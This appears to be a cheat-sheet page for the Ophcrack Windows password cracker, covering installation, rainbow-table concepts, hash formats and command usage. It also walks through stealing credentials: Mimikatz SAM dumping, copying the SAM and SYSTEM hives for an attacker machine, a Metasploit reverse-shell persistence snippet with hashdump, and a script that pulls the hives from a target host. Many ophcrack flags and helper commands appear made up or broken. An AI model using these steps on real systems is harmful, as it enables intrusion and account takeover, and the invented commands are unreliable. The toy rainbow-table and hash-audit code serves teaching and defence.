
Ophcrack

Ophcrack is a Windows password cracker that uses rainbow tables to quickly recover plaintext passwords from LM and NTLM hashes. It supports cracking passwords from Windows systems by dumping and analyzing password hashes. Ophcrack can work standalone or with tools like Ophcrack Live to crack passwords on Windows systems without booting the OS.

The tool combines efficient rainbow table lookups with additional brute-force capabilities for remaining passwords. It’s commonly used in penetration testing, incident response, and authorized password recovery scenarios.

1. Download installer from ophcrack.sourceforge.net
2. Run installer (ophcrack-3.8.0-installer.exe)
3. Follow installation wizard
4. Launch Ophcrack from Start Menu
```bash
# Debian/Ubuntu
sudo apt-get update
sudo apt-get install ophcrack ophcrack-data
```

```bash
# RHEL/CentOS
sudo yum install ophcrack
# or (Fedora / newer RHEL)
sudo dnf install ophcrack
```
```bash
# Install dependencies
sudo apt-get install build-essential cmake libqt4-dev libssl-dev

# Download source
wget https://sourceforge.net/projects/ophcrack/files/ophcrack/3.8.0/ophcrack-3.8.0.tar.bz2
tar -xjf ophcrack-3.8.0.tar.bz2
cd ophcrack-3.8.0

# Build
cmake .
make
sudo make install
```
```bash
# Build Docker image
docker build -t ophcrack .

# Run with GUI (requires X11)
docker run -it --rm -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix ophcrack
```
```bash
# Verify the installation
ophcrack --version
ophcrack --help
```
| Concept | Description |
|---|---|
| Rainbow Table | Precomputed hash chains that trade storage for lookup time; only chain start and end points are kept |
| NTLM Hash | Modern Windows hash format (MD4 of the UTF-16LE password, unsalted) |
| LM Hash | Legacy Windows hash format (DES-based; the password is split into two 7-character uppercase halves) |
| Hash Chain | Alternating sequence of hash and reduction steps; only its start and end points are stored |
| Reduction Function | Maps a hash value back into the password space to extend a chain |
| Brute-Force | Systematic password generation and testing for hashes the tables miss |
| Lookup | Fast password retrieval by recomputing the chain that contains a hash |
| Coverage | Percentage of the password space covered by the tables |
| Command | Description |
|---|---|
| `ophcrack -h` | Show help message |
| `ophcrack --version` | Display version |
| `ophcrack -f <file>` | Load hash file |
| `ophcrack -d <dir>` | Specify rainbow table directory |
| `ophcrack -n <num>` | Use N threads for cracking |
| `ophcrack -l` | List available rainbow tables |
| `ophcrack -g` | GUI mode |
| `ophcrack -c` | Console mode |
```bash
# Start GUI interface
ophcrack -g

# or
ophcrack
```
1. Load NTLM Hashes
   - From File → Select hash file
   - Import SAM dump
   - Paste hashes manually

2. Select Rainbow Tables
   - Choose table sets (XP, Vista, 7, etc.)
   - Verify table locations
   - Enable/disable specific tables

3. Start Cracking
   - Click "Crack" button
   - Monitor progress
   - View cracked passwords

4. Export Results
   - Save results to file
   - Copy passwords
   - Generate report
```bash
# Basic cracking
ophcrack -f hashes.txt

# Specify rainbow table directory
ophcrack -f hashes.txt -d /path/to/tables/

# Use specific number of threads
ophcrack -f hashes.txt -n 4

# Verbose output
ophcrack -f hashes.txt -v
```
```text
# Format: username:RID:LM_HASH:NTLM_HASH
Administrator:500:00000000000000000000000000000000:8846f7eaee8fb117ad06bdd830b7586c
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
User:1000:e52cac67419a6a9a42f8b3674a46f670:8846f7eaee8fb117ad06bdd830b7586c
```
```bash
# Run Mimikatz to extract hashes
mimikatz.exe

# In mimikatz prompt
privilege::debug
token::elevate
sam::dump

# Output will show NTLM hashes
```
```bash
# Extract from SAM/SYSTEM
hashcat-tools pwdump.pl
sudo ./pwdump.pl > hashes.txt

# Output hashes for Ophcrack
```
```bash
# Copy SAM file (requires SYSTEM privileges)
copy C:\Windows\System32\config\SAM C:\temp\SAM
copy C:\Windows\System32\config\SYSTEM C:\temp\SYSTEM

# Use on attacker machine
samdump2 SYSTEM SAM > hashes.txt
```
```bash
# Unshadow combines /etc/passwd and /etc/shadow into one file
unshadow /etc/passwd /etc/shadow > crackable.txt

# Note: Ophcrack's rainbow tables only cover unsalted LM/NTLM hashes; salted Linux
# hashes (md5crypt, sha512crypt, ...) cannot be converted and are cracked with John instead
john --format=md5crypt --wordlist=rockyou.txt crackable.txt
```
| Table Set | Target | Coverage | Size |
|---|---|---|---|
| XP Free | WinXP/2003 | 99.9% (8 chars) | ~700 MB |
| XP Special | WinXP/2003 | 99.9% (8 chars, special) | ~1 GB |
| Vista Free | Vista/7/8 | 99.9% (8 chars) | ~700 MB |
| Vista Special | Vista/7/8 | 99.9% (8 chars, special) | ~1 GB |
| 7 Free | Windows 7 | 99.9% (8 chars) | ~700 MB |
| 7 Special | Windows 7 | 99.9% (8 chars, special) | ~1 GB |
| Strongsalt Free | Any | 99.9% (8 chars) | ~700 MB |
```bash
# Official Ophcrack site (free tables)
# https://ophcrack.sourceforge.io/tables.php

# Command-line download
wget https://sourceforge.net/projects/ophcrack/files/tables/...

# Unpack the rainbow tables
mkdir -p /opt/ophcrack/tables
tar -xzf ophcrack_tables.tar.gz -C /opt/ophcrack/tables/
```
```bash
# Create configuration
vi ~/.ophcrack/ophcrack.conf

# Add table directories
[rainbow_tables]
path = /opt/ophcrack/tables/xp_free/
path = /opt/ophcrack/tables/vista_free/

# Verify tables
ophcrack -l
```
```bash
# Crack single NTLM hash
echo "username:500:00000000000000000000000000000000:8846f7eaee8fb117ad06bdd830b7586c" > single.txt
ophcrack -f single.txt
```

```bash
# Crack multiple hashes from file
ophcrack -f hashes.txt --batch

# Output all results to file
ophcrack -f hashes.txt --batch --output results.txt
```

```bash
# Multi-threaded cracking
ophcrack -f hashes.txt -n 8

# Fast mode (less accurate)
ophcrack -f hashes.txt --fast

# Thorough mode (more accurate)
ophcrack -f hashes.txt --thorough

# Specify rainbow table directory
ophcrack -f hashes.txt -d /mnt/rainbow_tables/
```
```bash
# 1. Extract hashes from compromised system
# (sam_dump.txt holds the pwdump-style SAM dump: user:RID:LM:NTLM:::)

# 2. Normalise to the four-field format Ophcrack reads (user:RID:LM:NTLM)
python3 -c "
import sys
for line in sys.stdin:
    parts = line.strip().split(':')
    if len(parts) < 4:
        continue  # skip blank or malformed lines
    user, rid, lm, ntlm = parts[:4]
    print(f'{user}:{rid}:{lm}:{ntlm}')
" < sam_dump.txt > ophcrack_input.txt

# 3. Crack with Ophcrack
ophcrack -f ophcrack_input.txt

# 4. Recover plaintext passwords
# Monitor progress and collect results
```
```bash
# Collect system hashes
# From forensic image or live system
imager extract SAM

# Process with Ophcrack
ophcrack -f forensic_hashes.txt --batch --output report.txt

# Analyze results for indicators
grep -v "^#" report.txt | grep -v "Cracking" > recovered_passwords.txt
```
Authorized password recovery scenario:

1. Boot with Ophcrack Live USB
2. Automatic SAM detection
3. Password cracking begins
4. Passwords displayed after cracking
```bash
# Extract hashes for hashcat
ophcrack -f hashes.txt --hash-only > hashes.hashcat

# Run hashcat for remaining hashes
hashcat -m 1000 -a 3 hashes.hashcat ?a?a?a?a?a?a?a?a
```
```bash
# Extract NTLM hashes
hashcat-tools pwdump.pl > hashes.txt

# Try Ophcrack first (fast with rainbow tables)
ophcrack -f hashes.txt

# Then John for remaining
john --format=NT --wordlist=rockyou.txt hashes.txt
```
```bash
# Generate payload for SAM dump
msfconsole
use exploit/windows/local/persistence_service
set PAYLOAD windows/shell_reverse_tcp

# Dump SAM
set post/windows/gather/hashdump
run

# Convert and crack with Ophcrack
ophcrack -f dumped_hashes.txt
```
```bash
# NVIDIA GPU support (with CUDA)
# Recompile with CUDA support
cmake . -DUSE_CUDA=ON
make

# Run with GPU
ophcrack -f hashes.txt --gpu
```
```bash
# Choose appropriate tables for target
# Windows XP/2003: Use XP tables
ophcrack -f hashes.txt -d /tables/xp_free/

# Windows 7/8: Use 7 tables
ophcrack -f hashes.txt -d /tables/7_free/

# Unknown: Try multiple table sets
ophcrack -f hashes.txt -d /tables/
```

```bash
# Use multiple threads
ophcrack -f hashes.txt -n 16

# Distribute across machines
# Each instance processes different hash subset
# Combine results manually
```

```bash
# Limit memory usage
ophcrack -f hashes.txt --max-memory 2G

# CPU thread allocation
ophcrack -f hashes.txt -n 4  # 4 threads

# Monitor performance
ophcrack -f hashes.txt -n 8 --monitor
```
```bash
# Remove duplicates
sort -u hashes.txt > hashes_unique.txt
ophcrack -f hashes_unique.txt

# Remove already-cracked entries
# (comm needs both inputs sorted on the compared field, so cut first, then sort)
grep "^#" previous_results.txt | cut -d: -f3 | sort -u > cracked_hashes.txt
comm -23 <(cut -d: -f3 hashes.txt | sort -u) cracked_hashes.txt > remaining.txt
```
```text
Loaded 5 hashes

Starting cracking...
[████████████░░░░░░░░░░░░░░] 45%

Results:
admin: Password123        [CRACKED]
user:                     [NOT FOUND]
guest: [blank password]   [CRACKED]
test: abc123              [CRACKED]
```

Status legend:
  • [CRACKED] - Password found in rainbow tables
  • [NOT FOUND] - Not in tables, couldn't crack
  • [EMPTY] - No password (blank)
  • [DISABLED] - Account disabled
```bash
# Save results to file
ophcrack -f hashes.txt --output results.txt

# Parse results (user and password columns only)
grep "CRACKED" results.txt | cut -d: -f1,2

# Count success rate
total_hashes=$(wc -l < hashes.txt)
echo "Success: $(grep -c CRACKED results.txt)/$total_hashes"
```
  • Use only on systems you own or have authorization to test
  • Secure cracked passwords and results
  • Consider privacy implications of password recovery
  • Maintain audit trails of cracking operations
  • Dispose of password lists securely
  • Follow organizational security policies
  • Respect legal and regulatory requirements
Possible causes (password not found):
  1. Rainbow table doesn't have password
  2. Password outside character set
  3. Password longer than table supports

Workarounds:
  • Get larger rainbow tables
  • Use brute-force (slower)
  • Use hashcat with GPU
  • Dictionary + rules with John

Check table coverage:
  • Most tables: 99.9% for 8 characters
  • Longer passwords less likely to crack
  • Special characters: use special table sets

Calculate likelihood:
  • LM: only 7 uppercase characters per half, high crack rate
  • NTLM: full character set, lower rate for long passwords
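To make the Hash Chain, Reduction Function and Coverage concepts from the table above and the "not found" causes just listed concrete, here is an added toy rainbow table for NTLM hashes over a 3-character lowercase keyspace. It is example code written for this page, not part of Ophcrack; `reduce_fn`, `build_table`, `lookup` and `TABLE` are names chosen here, and the SHA-256 fallback in `ntlm()` is a demo assumption for builds where OpenSSL 3 has MD4 disabled.

```python
import hashlib
import itertools
# Toy keyspace (constructed for the demo): 3 lowercase letters = 17576 passwords; real
# Ophcrack tables cover NTLM up to 8+ characters with chains thousands of steps long
CHARSET = "abcdefghijklmnopqrstuvwxyz"
PW_LEN, CHAIN_LEN = 3, 20
SPACE = len(CHARSET) ** PW_LEN

def ntlm(password: str) -> bytes:
    # NTLM = MD4(UTF-16LE(password)); falls back to SHA-256 (demo-only) if OpenSSL 3 hides MD4
    data = password.encode("utf-16-le")
    try:
        return hashlib.new("md4", data).digest()
    except ValueError:
        return hashlib.sha256(data).digest()

def reduce_fn(digest: bytes, column: int) -> str:
    # Reduction: hash -> password; mixing in the column index is what makes it a *rainbow* table
    n = (int.from_bytes(digest[:8], "little") + column) % SPACE
    chars = []
    for _ in range(PW_LEN):
        chars.append(CHARSET[n % len(CHARSET)])
        n //= len(CHARSET)
    return "".join(chars)

def build_table(start_points):
    # Only (end point -> start points) is stored; chains are recomputed at lookup time
    table = {}
    for start in start_points:
        pw = start
        for col in range(CHAIN_LEN):
            pw = reduce_fn(ntlm(pw), col)
        table.setdefault(pw, []).append(start)
    return table

def lookup(table, target: bytes):
    # Guess the target's column, walk to the chain end, regenerate that chain, check each hash
    for col in range(CHAIN_LEN - 1, -1, -1):
        pw = reduce_fn(target, col)
        for i in range(col + 1, CHAIN_LEN):
            pw = reduce_fn(ntlm(pw), i)
        for start in table.get(pw, []):
            cand = start
            for i in range(CHAIN_LEN):
                if ntlm(cand) == target:
                    return cand
                cand = reduce_fn(ntlm(cand), i)
    return None  # [NOT FOUND]: outside the charset/length, or an uncovered keyspace slice
ALL_PASSWORDS = ["".join(t) for t in itertools.product(CHARSET, repeat=PW_LEN)]
TABLE = build_table(ALL_PASSWORDS[::7])  # ~2500 chains x 20 steps for 17576 passwords
```

A password outside the charset or length (uppercase, a fourth character) returns `None`, which is the [NOT FOUND] case above; storing fewer chains (a larger step than `[::7]`) lowers the fraction of `ALL_PASSWORDS` that `lookup` recovers, which is the "Coverage" figure.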
If cracking is slow:
  1. Allocate more CPU threads
  2. Use GPU acceleration (NVIDIA)
  3. Optimize rainbow table paths (SSD)
  4. Reduce number of simultaneous hashes
```bash
# Verify table locations
ls -la /opt/ophcrack/tables/

# Configure paths
ophcrack -d /path/to/tables/

# Check configuration file
cat ~/.ophcrack/ophcrack.conf
```

```bash
# Install Qt dependencies
sudo apt-get install libqt4-gui

# Run in console mode
ophcrack -f hashes.txt -c

# Check for display server
echo $DISPLAY
```
```bash
# Correct hash format
username:RID:LM_HASH:NTLM_HASH

# Validate format (hex digits may be upper- or lowercase, as in the sample file above)
grep -E "^[^:]+:[0-9]+:[A-Fa-f0-9]{32}:[A-Fa-f0-9]{32}$" hashes.txt

# Convert from other tools
hashcat-tools prepare_hashes.sh input.txt > ophcrack_format.txt
```
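As an added example covering both the hash file format shown earlier and this format check (it is not part of Ophcrack): a small Python parser that applies the same validation case-insensitively and then audits the records for what a defender should look at before cracking anything, namely accounts that still store an LM hash, blank passwords, and password reuse visible from identical unsalted NTLM hashes. The sample input is constructed to mirror the page's sample file; `parse`, `audit` and the finding labels are names chosen here.

```python
import re
from collections import defaultdict
# Ophcrack line format username:RID:LM_HASH:NTLM_HASH; hex is case-insensitive and a
# trailing ':::' from pwdump/samdump2 output is tolerated
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):*$")
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NTLM hash of the empty string
NO_LM = {EMPTY_LM, "0" * 32}                   # all-zero placeholder some dumpers emit

def parse(text: str):
    """Return (valid records, [(line_no, raw)] that Ophcrack would reject)."""
    records, rejected = [], []
    for no, raw in enumerate(text.splitlines(), 1):
        if not raw.strip() or raw.startswith("#"):
            continue
        m = LINE_RE.match(raw.strip())
        if not m:
            rejected.append((no, raw))
            continue
        user, rid, lm, nt = m.groups()
        records.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return records, rejected

def audit(records):
    """Findings a defender wants before (or instead of) cracking anything."""
    findings, by_nt = [], defaultdict(list)
    for r in records:
        if r["lm"] not in NO_LM:
            # A real LM hash means LM storage is still enabled (7-char uppercase halves,
            # trivially recovered by the XP tables): enforce NoLMHash and rotate the password
            findings.append((r["user"], "lm_hash_stored"))
        if r["nt"] == EMPTY_NT:
            findings.append((r["user"], "blank_password"))
        by_nt[r["nt"]].append(r["user"])
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            # NTLM is unsalted, so identical hashes = identical passwords: reuse is visible
            # without cracking, and one cracked hash unlocks every account in the group
            findings.append((",".join(sorted(users)), "shared_password"))
    return findings

# Constructed sample in the same shape as the hash file shown earlier on this page
SAMPLE = """# Format: username:RID:LM_HASH:NTLM_HASH
Administrator:500:00000000000000000000000000000000:8846f7eaee8fb117ad06bdd830b7586c
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
User:1000:e52cac67419a6a9a42f8b3674a46f670:8846f7eaee8fb117ad06bdd830b7586c
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:8846F7EAEE8FB117AD06BDD830B7586C:::
broken:1002:notahash:8846f7eaee8fb117ad06bdd830b7586c
"""
RECORDS, REJECTED = parse(SAMPLE)
FINDINGS = audit(RECORDS)
```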
```bash
# Generate custom tables
rainbowcrack genrt -t <hash_type> -c <charset> -l <min_len> -m <max_len> -s <start> -e <end>

# Example: SHA-1 tables
rainbowcrack genrt -t sha1 -c /PATH/TO/charset/mixalpha-numeric#1-8 \
  -l 1 -m 8 -s 0 -e 100000000 myrt
```
```bash
#!/bin/bash
# Automated hash cracking workflow
set -euo pipefail

# 1. Fetch the SAM and SYSTEM hives (samdump2 needs both: SYSTEM holds the boot key)
source_system="target.example.com"
scp "admin@${source_system}:/backup/SAM" "admin@${source_system}:/backup/SYSTEM" .

# 2. Convert format
samdump2 SYSTEM SAM > hashes.txt

# 3. Crack with Ophcrack
ophcrack -f hashes.txt --batch --output results.txt

# 4. Parse and report (grep exits non-zero when nothing was cracked, hence "|| true")
{
  echo "=== Password Crack Results ==="
  echo "Total Hashes: $(wc -l < hashes.txt)"
  echo "Cracked: $(grep -c CRACKED results.txt || true)"
  echo ""
  grep CRACKED results.txt || true
} > report.txt
```
  • Hashcat - GPU-accelerated password cracker
  • John the Ripper - CPU-based password cracker
  • Mimikatz - Credential extraction tool
  • Hashtools - Hash utilities and conversion
  • Rainbowcrack - Rainbow table generator
  • Cain & Abel - Windows password recovery